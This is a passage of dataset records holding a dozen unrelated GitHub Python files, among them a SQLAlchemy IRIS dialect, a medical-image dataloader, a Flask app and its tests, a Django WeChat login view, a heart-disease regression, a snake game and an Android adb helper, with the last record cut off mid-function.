connection.execution_options(future_result=True).execute(s)\n\n cols = []\n for row in c.mappings():\n name = row[columns.c.column_name]\n type_ = row[columns.c.data_type].upper()\n nullable = row[columns.c.is_nullable] == \"YES\"\n charlen = row[columns.c.character_maximum_length]\n numericprec = row[columns.c.numeric_precision]\n numericscale = row[columns.c.numeric_scale]\n default = row[columns.c.column_default]\n collation = row[columns.c.collation_name]\n autoincrement = row[columns.c.auto_increment]\n # description = row[columns.c.description]\n\n coltype = self.ischema_names.get(type_, None)\n\n kwargs = {}\n if coltype in (\n VARCHAR,\n BINARY,\n TEXT,\n VARBINARY,\n ):\n if charlen == -1:\n charlen = None\n kwargs[\"length\"] = charlen\n if collation:\n kwargs[\"collation\"] = collation\n if coltype is None:\n util.warn(\n \"Did not recognize type '%s' of column '%s'\"\n % (type_, name)\n )\n coltype = sqltypes.NULLTYPE\n else:\n if issubclass(coltype, sqltypes.Numeric):\n kwargs[\"precision\"] = numericprec\n\n if not issubclass(coltype, sqltypes.Float):\n kwargs[\"scale\"] = numericscale\n\n coltype = coltype(**kwargs)\n\n cdict = {\n \"name\": name,\n \"type\": coltype,\n \"nullable\": nullable,\n \"default\": default,\n \"autoincrement\": autoincrement,\n # \"comment\": description,\n }\n cols.append(cdict)\n\n if cols:\n return cols\n\n return None\n\n @reflection.cache\n def get_view_names(self, connection, schema=None, **kw):\n schema_name = self.get_schema(schema)\n views = ischema.views\n s = (\n sql.select(views.c.table_name)\n .where(\n views.c.table_schema == str(schema_name),\n )\n .order_by(views.c.table_name)\n )\n view_names = [r[0] for r in connection.execute(s)]\n return view_names\n\n @reflection.cache\n def get_view_definition(self, connection, view_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n views = ischema.views\n\n view_def = connection.execute(\n sql.select(views.c.view_definition)\n .where(\n views.c.table_schema == str(schema_name),\n views.c.table_name == str(view_name),\n )\n ).scalar()\n\n if view_def:\n return view_def\n return None\n","repo_name":"SergeyMi37/sqlalchemy-iris","sub_path":"sqlalchemy_iris/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":26718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"14770409224","text":"import 
os\nimport cv2\nimport sys\nimport pdb\nimport six\nimport glob\nimport time\nimport torch\nimport random\nimport pandas\nimport warnings\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nimport numpy as np\n# import pyarrow as pa\nfrom PIL import Image\nimport torch.utils.data as data\nimport matplotlib.pyplot as plt\nfrom torch.utils.data.sampler import Sampler\n\nsys.path.append(\"..\")\n\n\nclass BaseFeeder(data.Dataset):\n # initialization\n def __init__(self, folder_path, prefix=\"./\", mean=None, std=None, mode='train', resize_h=224,\n resize_w=224, img_dim=1):\n self.folder_path = folder_path\n self.prefix = prefix\n self.files = []\n self.resize_h=resize_h\n self.resize_w=resize_w\n self.img_dim=img_dim\n self.mode = mode\n folder = os.path.join(prefix, folder_path, mode, \"\")\n print(folder)\n for file in os.listdir(folder):\n d = os.path.join(folder, file)\n if os.path.isdir(d):\n if os.path.isfile(d + \"/{}_0\".format(file) + \".png\"):\n self.files.append(d + \"/{}_0\".format(file))\n if os.path.isfile(d + \"/{}_1\".format(file) + \".png\"):\n self.files.append(d + \"/{}_1\".format(file))\n \n if mean == None or std == None:\n print(\"Calculating mean and std of the {} set...\".format(mode))\n self.mean, self.std = self.calculate_stat()\n else:\n self.mean = mean\n self.std = std\n\n def calculate_stat(self):\n num_image = 0\n psum = torch.tensor([0.0,]*self.img_dim)\n psum_sq = torch.tensor([0.0,]*self.img_dim)\n for file in self.files:\n num_image+=1\n\n img_path = file + \".png\"\n \n image = cv2.imread(img_path, cv2.IMREAD_ANYDEPTH)\n image = torch.from_numpy(cv2.resize(image, (self.resize_h,\n self.resize_w), interpolation = cv2.INTER_AREA)).type(torch.FloatTensor)\n \n if self.img_dim == 1:\n psum += image.sum()\n psum_sq += (image ** 2).sum()\n else:\n psum += image.sum()\n psum_sq += (image ** 2).sum() \n\n count = num_image*self.resize_h*self.resize_w \n total_mean = psum / count\n total_var = (psum_sq / count) - (total_mean ** 2)\n total_std = torch.sqrt(total_var)\n\n return total_mean.item(), total_std.item()\n # getitem attribute\n def __getitem__(self, idx):\n img_path = self.files[idx] + \".png\"\n image = cv2.imread(img_path, cv2.IMREAD_ANYDEPTH)\n image = cv2.resize(image, (224,224), interpolation = cv2.INTER_AREA)\n image = np.expand_dims(image, axis=0)\n image = torch.from_numpy(image).type(torch.FloatTensor)\n image = (image - self.mean)/(self.std + 0.00001)\n\n mask_path = self.files[idx] + \"_cancer.png\"\n mask = cv2.imread(mask_path, cv2.IMREAD_ANYDEPTH)\n mask = cv2.resize(mask, (224,224), interpolation = cv2.INTER_AREA) \n mask = torch.from_numpy(mask).type(torch.FloatTensor)\n mask = torch.unsqueeze(mask, 0)\n\n return image, mask\n\n # collate_fn method\n # batch is list\n @staticmethod\n def collate_fn(batch):\n imgs, masks = list(zip(*batch))\n\n imgs = torch.stack(imgs, dim = 0)\n\n masks = torch.stack(masks, dim = 0)\n\n return imgs, masks\n\n def __len__(self):\n return len(self.files)\n\n def record_time(self):\n self.cur_time = time.time()\n return self.cur_time\n\n def split_time(self):\n split_time = time.time() - self.cur_time\n self.record_time()\n return split_time\n\n\nif __name__ == \"__main__\":\n\n pass\n\n # feeder = BaseFeeder(r\"E:\\CSAWS\\CSAW-S\\CsawS\\anonymized_dataset\", prefix=\"\")\n # dataloader = torch.utils.data.DataLoader(\n # dataset=feeder,\n # batch_size=2,\n # shuffle=True,\n # drop_last=True,\n # num_workers=0,\n # )\n # for batch_idx, data in enumerate(dataloader):\n # print(data[0].shape)\n # 
break","repo_name":"Tommy-Ngx/breast_cancer_segmentation","sub_path":"dataset/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2832582047","text":"from math import *\r\nimport os\r\nfrom xml.dom import minidom\r\nimport svg.path\r\n\r\n# MAX VECTOR VALUES\r\nMAX_VALUE = 800\r\n\r\np = \"\"\r\n# OPEN RAW DATAS FILE\r\nfpath = f\"svgs/{p}.svg\"\r\nf = open(fpath, \"r\")\r\ndoc = minidom.parse(f) # parseString also exists\r\npath_strings = [path.getAttribute('d') for path\r\n in doc.getElementsByTagName('path')]\r\n\r\ndoc.unlink()\r\nf.close()\r\n\r\n# parse path\r\npath_strings = path_strings[0]\r\npath = svg.path.parse_path(path_strings)\r\n\r\ndef f(t):\r\n return path.point(t)\r\n\r\nt = 0\r\ndt = .0001\r\npts = []\r\nmaximum = 0\r\nwhile(t<1):\r\n y = f(t)\r\n pts.append(y)\r\n maximum = max(maximum,abs(y))\r\n t = t + dt\r\n\r\n# CREATE END STRING\r\ntextReturn = f\"let drawing_{p} = [\\n\"\r\n\r\nfor c in pts:\r\n textReturn += \" {re: \" + str(MAX_VALUE*c.real/maximum) + \", im: \" + str(MAX_VALUE * c.imag/maximum) + \"},\\n\"\r\ntextReturn += \"];\"\r\n\r\n\r\n# OUTPUT TO DATAS FILE\r\nf2 = open(f\"drawing_{p}.js\", \"w\")\r\nf2.write(textReturn)\r\nf2.close()\r\n\r\n\r\n# SUCCESS\r\nprint(f\"SUCCESS converting SVG file to JS file: drawing_{p}.js\")\r\n","repo_name":"katanovbrian/fourier_draw","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16269651130","text":"from psych.factory import create_app\nfrom psych.db import disorders_init, accounts_init, update_status, videos_init, appointments_init\n\nimport os\nimport configparser\n\nfrom datetime import datetime, timedelta\nfrom flask_apscheduler import APScheduler\n\nfrom flask_mail import Mail\n\nconfig = configparser.ConfigParser()\nconfig.read(os.path.abspath(os.path.join(\".ini\")))\n\n\nclass Config:\n SCHEDULER_API_ENABLED = True\n\n\nscheduler = APScheduler()\nmail = Mail()\n\n# interval examples\n@scheduler.task(\"interval\", id=\"status_update\", seconds=60)\ndef status_update():\n with scheduler.app.app_context():\n current_time = (datetime.now() + timedelta(hours=1)\n ).strftime('%Y/%m/%d_%H')\n print(f\"TRY TO UPDATE ACTIVE APPOINMENTS WITH {current_time} ...\")\n update_status(machine_time=current_time, mail=mail)\n \n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.config['DEBUG'] = False\n app.config['MONGO_URI'] = config['PROD']['DB_URI']\n\n with app.app_context():\n disorders_init()\n accounts_init()\n videos_init()\n appointments_init()\n print(\"DB connected!\")\n print(\"DB init!\")\n\n app.config.from_object(Config())\n scheduler.init_app(app)\n scheduler.start()\n\n app.config['SENDER_TUPLE_1'] = config['PROD']['MAIL_SENDER']\n app.config['SENDER_TUPLE_2'] = config['PROD']['MAIL_USERNAME']\n \n app.config.update(\n # EMAIL SETTINGS\n MAIL_SERVER='smtp.gmail.com',\n MAIL_PORT=465,\n MAIL_USE_SSL=True,\n MAIL_DEFAULT_SENDER=(app.config['SENDER_TUPLE_1'], app.config['SENDER_TUPLE_2']),\n MAIL_MAX_EMAILS=10,\n MAIL_USERNAME=config['PROD']['MAIL_USERNAME'],\n MAIL_PASSWORD=config['PROD']['MAIL_PASSWORD']\n )\n mail.init_app(app)\n 
app.run()\n","repo_name":"hc-psy/wp-final-api","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38736679171","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 3 18:38:12 2019\r\n\r\n@author: gontier\r\n\"\"\"\r\n\r\n# Computes the log likelihood of data under model M_2\r\n# INPUT : vector of EPSCs, values for N, p, q, sigma, and tauD, and vector of ISI\r\n# (convention : delta_t[0] = 0, delta_t[i] = t_i - t_{i-1})\r\n# OUTPUT : log p(EPSC|theta)\r\n\r\nimport numpy as np\r\nimport scipy.stats\r\n\r\ndef ll_binomial_tau_D(EPSP,N,p,q,sigma,tau_D,delta_t):\r\n T = EPSP.size\r\n \r\n # Uses the Baum-Welch algorithm (https://en.wikipedia.org/wiki/Baum%E2%80%93Welch_algorithm)\r\n A = np.zeros([N+1,N+1,N+1,N+1,T])\r\n #A[n_i,k_i,n_i+1,k_i+1,i+1] : probability to transit from i to i+1\r\n for n1 in range(N+1):\r\n for k1 in range(n1+1):\r\n for n2 in range(N+1):\r\n for k2 in range(n2+1):\r\n for i in range(T-1):\r\n A[n1,k1,n2,k2,i+1] = scipy.stats.binom.pmf(k2,n2,p)*scipy.stats.binom.pmf(n2-n1+k1,N-n1+k1,1-np.exp(-delta_t[i+1]/tau_D))\r\n \r\n \r\n B = np.zeros([N+1,N+1,T])\r\n for n in range(N+1):\r\n for k in range(n+1):\r\n for i in range(T):\r\n B[n,k,i] = scipy.stats.norm.pdf(EPSP[i],loc=q*k,scale=sigma)\r\n\r\n alpha = np.zeros([N+1,N+1,T]) #n,k,i\r\n\r\n for k in range(N+1): \r\n alpha[N,k,0] = scipy.stats.binom.pmf(k,N,p)*scipy.stats.norm.pdf(EPSP[0],loc=q*k,scale=sigma)\r\n \r\n for i in range(T-1):\r\n for n in range(N+1):\r\n for k in range(n+1):\r\n alpha[n,k,i+1] = B[n,k,i+1]*sum(alpha[nn,kk,i]*A[nn,kk,n,k,i+1] for kk in range(N+1) for nn in range (N+1))\r\n \r\n return np.log(np.sum(alpha,(0,1))[-1])","repo_name":"camillegontier/identifiability_binomial","sub_path":"likelihood/gaussian_noise/ll_binomial_STD.py","file_name":"ll_binomial_STD.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8843228334","text":"\"\"\"\nUnit test module for the Flask application in app.py\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\nimport json\nimport os\nimport sys\nimport unittest\n\ntest_dir = os.path.dirname(os.path.abspath(__file__))\nmain_dir = os.path.dirname(test_dir)\nsys.path.extend([test_dir, main_dir])\n\nfrom app import app, db\n\n\nif os.environ.get('DBASE_URL'):\n db_url = os.environ.get('DBASE_URL')\nelse:\n db_url = 'sqlite:///{p}'.format(p=os.path.join(main_dir, 'stops.sqlite'))\n\n\nclass AppTest(unittest.TestCase):\n \"\"\"Test all app endpoints. 
Assumes local database tables have been populated.\"\"\"\n\n    def setUp(self):\n        \"\"\"Set up test variables\"\"\"\n        app.app_context().push()\n        app.config['TESTING'] = True\n        app.config['SQLALCHEMY_DATABASE_URI'] = db_url\n        self.client = app.test_client()\n\n    def tearDown(self):\n        \"\"\"Close the database connection and pop the app client\"\"\"\n        db.session.close()\n\n    def test_codes(self):\n        \"\"\"Test status codes for app endpoints\"\"\"\n        endpoints = {\n            'index.html': 404,\n            '/': 200,\n            '/sw.js': 200,\n            '/universities.html': 404,\n            '/universities': 200,\n            '/data/cleaner_universities.json': 404,\n            '/universities/data': 200,\n            '/stops?lat=42.35947&lon=-71.09296': 200,\n            '/stop/5': 200,\n        }\n        for e, exp in endpoints.items():\n            with self.subTest('Testing endpoint {e}'.format(e=e), end=e, expect=exp):\n                self.assertEqual(self.client.get(e).status_code, exp)\n\n    def test_stop(self):\n        \"\"\"Test stop endpoints for the given MBTA stop IDs\"\"\"\n        endpoints = {\n            '/stop/bad': 'bad',\n            '/stop/2': 'good',\n            '/stop/1000': 'bad',\n            '/stop/225': 'good',\n        }\n        for e, exp in endpoints.items():\n            with self.subTest('Testing API endpoint {e}'.format(e=e), end=e, expect=exp):\n                data = json.loads(self.client.get(e).data.decode('utf8'))\n                self.assertEqual(data.get('status'), exp)\n\n    def test_stops(self):\n        \"\"\"Test the stops endpoint, which expects query strings.\"\"\"\n        endpoints = {\n            '/stops?lat=42.35947&lon=-71.09296': 'good',\n            '/stops?lat=42.36947&lon=-71.08296': 'good',\n            '/stops?lat=bad&lon=bad': 'bad',\n            '/stops?lat=420.35947&lon=-710.09296': 'bad'\n        }\n        for e, exp in endpoints.items():\n            with self.subTest('Testing API endpoint {e}'.format(e=e), end=e, expect=exp):\n                data = json.loads(self.client.get(e).data.decode('utf8'))\n                # Test for equality\n                self.assertEqual(data.get('status'), exp)\n                # Also, test that if the status is good, then stops is not empty.\n                # However, if status is not good, then stops must be empty\n                self.assertTrue((data.get('status') == 'good') == bool(data.get('stops')))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"growwithgooglema/mbtaccess","sub_path":"tests/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
+{"seq_id":"34680968854","text":"# 1 Create a variable count with the value 0\n# 2 Create a variable range_count with the value 10\n# 3 Create a variable for_count with the value 0\n# 4 Create a variable run with the value True\n\ncount = 0\nrange_count = 10\nfor_count = 0\nrun = True\n\n# 5. Make a while loop that runs while run\n# Loop body:\n# \t5.1 Print “Hello Cycle” to the console\n\nwhile run:\n    print('Hello Cycle')\n\n# 6. Make a while loop that runs while run\n# Loop body:\n# \t6.1 Print (“Step =”, count) to the console\n# \t6.2 Add 1 to the variable count with assignment.\n\nwhile run:\n    print('Step =', count)\n    count += 1\n\n# 7. Make a while loop that runs while count < range_count\n# Loop body:\n# \t7.1 Print (“Step =”, count) to the console\n# \t7.2 Add 1 to the variable count with assignment.\n\nwhile count < range_count:\n    print('Step =', count)\n    count += 1\n\n# 8. Make a while loop that runs while count < range_count\n# Loop body:\n# \t8.1 Print (“Step =”, count) to the console\n# \t8.2 Add 1 to the variable count with assignment.\n# \t8.3 Make an if with the condition: if count equals 3, print (“Step =”, count, ‘If body’) to the console\n\nwhile count < range_count:\n    print('Step =', count)\n    count += 1\n    if count == 3:\n        print('Step =', count, 'If body')\n\n# 9 Make a while loop that runs while run\n# Loop body:\n# \t9.1 Print (“Step =”, count) to the console\n# \t9.2 Add 1 to the variable count with assignment.\n# \t9.2 Make an if with the condition: if count equals range_count, the loop stops.\n# \t9.3 Inside the if, print (“STOP”, count) to the console\n\nwhile run:\n    print('Step =', count)\n    count += 1\n    if count == range_count:\n        break\nprint('STOP', count)","repo_name":"Marussia636/domashka","sub_path":"Pythoncode/HW_4.py","file_name":"HW_4.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"18979309826","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport MongoConn\nfrom facenote import wechat\nfrom bson import json_util, objectid\nimport datetime\nimport logging\nimport json\n\nlogging.basicConfig(\n    level = logging.INFO,\n    format = '%(asctime)s %(levelname)s %(message)s',\n    filename = './djangoLog.log',)\n\ndef index(request):\n    return HttpResponse(\"login app\")\n\ndef login(request):\n    if request.method == 'GET':\n        res = {}\n        print(request.GET)\n        logging.info(request.META)\n        logging.info(request.GET)\n        res['name'] = request.GET.get('name', 'defaultname')\n        res['passwd'] = request.GET.get('passwd')\n        return HttpResponse(\"get method\")\n    \n    if request.method == 'POST':\n        res = {}\n        \n        code = request.POST.get('code')\n        logging.info(code)\n        openid, session_key = wechat.get_openid(code)\n        token = wechat.get_token(openid + session_key)\n        res['token'] = token\n\n        now = datetime.datetime.utcnow()\n        expire_time = now + datetime.timedelta(weeks = 1)\n        # expire_time = now + datetime.timedelta(minutes = 60)\n        print(expire_time)\n\n        token_ttl = {}\n        token_ttl['token'] = token\n        token_ttl['openid'] = openid\n        token_ttl['expire_time'] = expire_time\n\n        MongoConn.update('token_ttl', {'openid' : openid}, {'$set' : {'expire_time' : expire_time, 'token' : token}}, True)\n\n        # res['user_id'] = openid\n        logging.info(token)\n        return HttpResponse(json_util.dumps(res,ensure_ascii=False),content_type='application/x-www-form-urlencoded;charset=utf-8')\n    ","repo_name":"liusongwei/facenote","sub_path":"facenote/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"8344026211","text":"# This launcher script is supposed to replace application calls and forward SIGTERM signals to them\nimport time\nimport signal\nimport os\nimport sys\nimport subprocess\nfrom multiprocessing import Process\n\nSTOP_TIMEOUT = 10\nstream = None\n\ndef signal_handler(sig, _frame):\n    \"\"\"Handling the SIGTERM event\"\"\"\n    print(f'Received signal {sig} - stopping gracefully in {STOP_TIMEOUT} seconds')\n    os.killpg(os.getpgid(stream.pid), sig)\n    count = STOP_TIMEOUT\n    while count > 0:\n        time.sleep(1)\n        count -= 1\n    print('Finished cleanup...')\n\n\ndef main():\n    \"\"\"Opening subprocesses\"\"\"\n    global stream\n    stream = subprocess.Popen([\"/home/stream_c\"] + sys.argv[1:], 
preexec_fn=os.setsid)\n signal.signal(signal.SIGTERM, signal_handler)\n stream.wait()\n print(\"Finish execution...\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"raijenki/hpc-tests","sub_path":"stream/outdated/launcher_v1.py","file_name":"launcher_v1.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24410350","text":"# %%\nimport numpy as np\nimport pandas as pd\nimport dm6103 as dm\nimport statsmodels.api as sm # Importing statsmodels\nfrom statsmodels.formula.api import glm\n\n\ndf = pd.read_csv(\"heart_2020_new.csv\")\ndm.dfChk(df)\n\n# %%\n\n# create binary variable for Heart Disease \ndf['HeartDiseaseBin'] = 0\ndf.loc[ df['HeartDisease'] == \"Yes\", 'HeartDiseaseBin' ] = 1\n\nmodel_predictions = pd.DataFrame()\n\nprint(df.head())\nformula = 'HeartDiseaseBin ~ BMI + C(Smoking) + C(AlcoholDrinking) + C(Stroke) + \\\n PhysicalHealth + MentalHealth + C(DiffWalking) + C(Sex) + C(Race) + \\\n C(Diabetic) + C(PhysicalActivity) + C(GenHealth) + \\\n SleepTime + C(Asthma) + C(KidneyDisease) + C(SkinCancer) + AgeCont'\nheart_disease = glm(formula=formula, data=df, family=sm.families.Binomial())\n\nheart_disease_fit = heart_disease.fit()\nprint(heart_disease_fit.summary())\nmodel_predictions['heart_disease'] = heart_disease_fit.predict(df)\n\n# add row of binary actual outcomes for comparison\nmodel_predictions['actual'] = df['HeartDiseaseBin']\n\n# check it out \nmodel_predictions.head()\n\n\n# %%\nprint(-2*heart_disease_fit.llf)\n# Compare to the null deviance\nprint(heart_disease_fit.null_deviance)\n\n# %%\n# Try three different cut-off values at 0.3, 0.5, and 0.7. What are the a) Total accuracy of the model b) The precision of the model (average for 0 and 1), and c) the recall rate of the model (average for 0 and 1)\ncut_offs = [0.3, 0.5, 0.7]\n\nfor cut_off in cut_offs:\n # Compute class predictions\n model_predictions['heart_disease_' + str(cut_off)] = np.where(model_predictions['heart_disease'] > cut_off, 1, 0)\n #\n # Make a cross table\n confusion: pd.DataFrame = pd.crosstab(df.HeartDiseaseBin, model_predictions['heart_disease_' + str(cut_off)],\n rownames=['Actual'], colnames=['Predicted'],\n margins = True)\n\n # print(confusion)\n\n true_neg = confusion[0][0]\n false_pos = confusion[1][0]\n false_neg = confusion[0][1]\n true_pos = confusion[1][1]\n\n total = confusion['All']['All']\n accuracy = (confusion.iloc[1][1] + confusion.iloc[0][0]) / total\n precision = true_pos / (true_pos + false_pos)\n recall = true_pos / (true_pos + false_neg)\n f1 = 2 * (precision*recall) / (precision + recall)\n print(f'Cutoff = {cut_off}:')\n print('f1: ', round(f1, 3))\n print('precision: ', round(precision, 3))\n print('recall: ', round(recall, 3))\n print()\n\n# %%\n # now try all of the above with the balanced dataset \n\ndf2 = pd.read_csv(\"heart_2020_balanced.csv\")\ndm.dfChk(df2)\n\n# %%\n# create binary variable for Heart Disease \ndf2['HeartDiseaseBin'] = 0\ndf2.loc[ df2['HeartDisease'] == \"Yes\", 'HeartDiseaseBin' ] = 1\n\nmodel_predictions_bal = pd.DataFrame()\n\nprint(df2.head())\nformula = 'HeartDiseaseBin ~ BMI + C(Smoking) + C(AlcoholDrinking) + C(Stroke) + \\\n PhysicalHealth + MentalHealth + C(DiffWalking) + C(Sex) + C(Race) + \\\n C(Diabetic) + C(PhysicalActivity) + C(GenHealth) + \\\n SleepTime + C(Asthma) + C(KidneyDisease) + C(SkinCancer) + AgeCont'\nheart_disease_bal = glm(formula=formula, data=df2, family=sm.families.Binomial())\n\nheart_disease_bal_fit = 
heart_disease_bal.fit()\nprint(heart_disease_bal_fit.summary())\nmodel_predictions_bal['heart_disease'] = heart_disease_bal_fit.predict(df2)\n\n# add row of binary actual outcomes for comparison\nmodel_predictions_bal['actual'] = df2['HeartDiseaseBin']\n\n# check it out \nmodel_predictions_bal.head()\n\n\n# %%\nprint(-2*heart_disease_bal_fit.llf)\n# Compare to the null deviance\nprint(heart_disease_bal_fit.null_deviance)\n\n# %%\n# Try three different cut-off values at 0.3, 0.5, and 0.7. What are the a) Total accuracy of the model b) The precision of the model (average for 0 and 1), and c) the recall rate of the model (average for 0 and 1)\ncut_offs = [0.3, 0.5, 0.7]\n\nfor cut_off in cut_offs:\n # Compute class predictions\n model_predictions_bal['heart_disease_' + str(cut_off)] = np.where(model_predictions_bal['heart_disease'] > cut_off, 1, 0)\n #\n # Make a cross table\n confusion_bal: pd.DataFrame = pd.crosstab(df2.HeartDiseaseBin, model_predictions_bal['heart_disease_' + str(cut_off)],\n rownames=['Actual'], colnames=['Predicted'],\n margins = True)\n\n # print(confusion)\n\n true_neg_bal = confusion_bal[0][0]\n false_pos_bal = confusion_bal[1][0]\n false_neg_bal = confusion_bal[0][1]\n true_pos_bal = confusion_bal[1][1]\n\n total_bal = confusion_bal['All']['All']\n accuracy_bal = (confusion_bal.iloc[1][1] + confusion_bal.iloc[0][0]) / total_bal\n precision_bal = true_pos_bal / (true_pos_bal + false_pos_bal)\n recall_bal = true_pos_bal / (true_pos_bal + false_neg_bal)\n f1_bal = 2 * (precision_bal*recall_bal) / (precision_bal + recall_bal)\n print(f'Cutoff = {cut_off}:')\n print('f1: ', round(f1_bal, 3))\n print('precision: ', round(precision_bal, 3))\n print('recall: ', round(recall_bal, 3))\n print()\n\n#%%\n\n# Use some test data:\ndata = [['No', 'No', 'No', 0, 0, 'No', 'Female', 'White', 'No', 'Yes', 'Excellent', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'No', 'Male', 'White', 'No', 'Yes', 'Excellent', 8, 'No', 'No', 'No', 40, 20], ['Yes', 'No', 'No', 0, 0, 'No', 'Female', 'White', 'No', 'Yes', 'Good', 8, 'No', 'No', 'No', 45, 23], ['Yes', 'Yes', 'No', 0, 0, 'No', 'Female', 'White', 'No', 'Yes', 'Poor', 8, 'No', 'No', 'No', 45, 23], ['Yes', 'No', 'Yes', 0, 0, 'No', 'Male', 'White', 'No', 'Yes', 'Fair', 5, 'No', 'No', 'No', 45, 23], ['No', 'No', 'No', 0, 0, 'No', 'Female', 'White', 'Yes', 'Yes', 'Excellent', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'Yes', 'Male', 'White', 'Yes', 'No', 'Good', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'Yes', 'Male', 'Asian', 'Yes', 'No', 'Good', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'Yes', 'Male', 'Asian', 'Yes', 'No', 'Good', 8, 'No', 'Yes', 'Yes', 40, 20]] \n\ntestData = pd.DataFrame(data, columns = ['Smoking', 'AlcoholDrinking', 'Stroke', 'PhysicalHealth', 'MentalHealth', 'DiffWalking', 'Sex', 'Race', 'Diabetic', 'PhysicalActivity', 'GenHealth', 'SleepTime', 'Asthma', 'KidneyDisease', 'SkinCancer', 'AgeCont', 'BMI'])\ntestData['Prediction'] = heart_disease_bal_fit.predict(testData)\nprint(testData)\ntestData.to_csv('Test_Pred.csv')\n\n# %%\n","repo_name":"NickBenevento/DATS_6103_Project","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13123029097","text":"import turtle\r\nimport time\r\nfrom snake import Snake\r\nfrom food import Food\r\nfrom scoreboard import Scoreboard\r\nscreen = turtle.Screen()\r\nscreen.setup(width=600, 
height=600)\r\nscreen.bgcolor(\"black\")\r\nscreen.title(\"Snake Game\")\r\nscreen.tracer(0)\r\n\r\nserpiente = Snake(3)\r\nfood = Food()\r\nscoreboard = Scoreboard()\r\nscreen.listen()\r\nscreen.onkey(serpiente.up,\"Up\")\r\nscreen.onkey(serpiente.left,\"Left\")\r\nscreen.onkey(serpiente.right,\"Right\")\r\nscreen.onkey(serpiente.down,\"Down\")\r\n\r\ngame_is_on = True\r\nwhile game_is_on:\r\n    screen.update()\r\n    time.sleep(0.1)\r\n    \r\n    serpiente.snake_movement()\r\n\r\n    if serpiente.head.distance(food) <= 15:\r\n        food.refresh()\r\n        scoreboard.increase_score()\r\n        serpiente.extend()\r\n    \r\n    if serpiente.head.xcor() < -280 or serpiente.head.xcor() > 280 or serpiente.head.ycor() < -280 or serpiente.head.ycor() > 280:\r\n        scoreboard.reset() \r\n        serpiente.reset()\r\n    \r\n    for segmento in serpiente.new_segments[1:]:\r\n        if segmento == serpiente.head:\r\n            pass\r\n        elif serpiente.head.distance(segmento) < 10:\r\n            scoreboard.reset() \r\n            serpiente.reset()\r\n    \r\n    \r\nscreen.exitonclick()\r\n\r\n\r\n","repo_name":"Camzzz5/SNAKE_GAME","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"29772751729","text":"\"\"\"Module with util functions to control Android devices.\"\"\"\n\nimport subprocess\nimport re\n\nfrom whichcraft import which\nimport click\n\ndef set_charging_enabled(enabled, serialno=None):\n    \"\"\"Enable or disable charging the device.\"\"\"\n    if serialno:\n        command = (\n            \"adb shell -s {serialno} dumpsys battery set ac {enabled};\"\n            \"adb shell -s {serialno} dumpsys battery set usb {enabled};\"\n        ).format(serialno=serialno, enabled=int(enabled))\n    else:\n        command = (\n            \"adb shell dumpsys battery set ac {enabled};\"\n            \"adb shell dumpsys battery set usb {enabled}\"\n        ).format(enabled=int(enabled))\n\n    subprocess.check_output(\n        command,\n        shell=True\n    )\n\ndef prevent_device_from_sleep(enabled):\n    \"\"\"Prevent the device from sleeping while USB is connected.\"\"\"\n    comand = \"adb shell svc power stayon {}\".format(\n        {True: 'usb', False: 'false'}[enabled]\n    )\n    subprocess.check_output(\n        comand,\n        shell=True\n    )\n\ndef is_screen_on():\n    \"\"\"Check whether the screen is on.\"\"\"\n    try:\n        subprocess.check_output(\n            \"adb shell dumpsys input_method | grep mInteractive=true\",\n            shell=True\n        )\n        return True\n    except subprocess.CalledProcessError:\n        pass\n    try:\n        subprocess.check_output(\n            'adb shell dumpsys power | grep \"Display Power: state=ON\"',\n            shell=True\n        )\n        return True\n    except subprocess.CalledProcessError:\n        pass\n    return False\n\ndef is_locked():\n    \"\"\"Check whether device is locked.\"\"\"\n    try:\n        output = subprocess.check_output(\n            \"adb shell service call trust 7\",\n            shell=True,\n            universal_newlines=True\n        )\n        match = re.search(r\"Parcel\\(00000000 00000001\", output)\n        return match is not None\n    except subprocess.CalledProcessError as e:\n        click.secho('Warning: {}'.format(e), fg='yellow')\n        return True\n\ndef wakeup():\n    \"\"\"Wake up device.\"\"\"\n    if not is_screen_on():\n        